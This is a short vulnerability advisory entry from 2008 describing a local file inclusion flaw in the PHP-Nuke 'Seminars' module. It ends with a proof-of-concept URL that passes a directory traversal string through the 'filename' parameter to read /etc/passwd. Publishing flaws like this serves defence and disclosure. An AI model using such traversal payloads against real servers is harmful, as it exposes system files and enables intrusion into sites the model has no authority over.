PHP-Nuke 'Seminars' Module - 'Filename' Local File Inclusion

EDB-ID:

31332

CVE:

N/A


Platform:

PHP

Published:

2008-03-04

source: http://www.securityfocus.com/bid/28089/info

The PHP-Nuke 'Seminars' module is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

Exploiting this issue may allow an unauthorized remote user to view files and execute local scripts in the context of the webserver process.

http://www.example.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd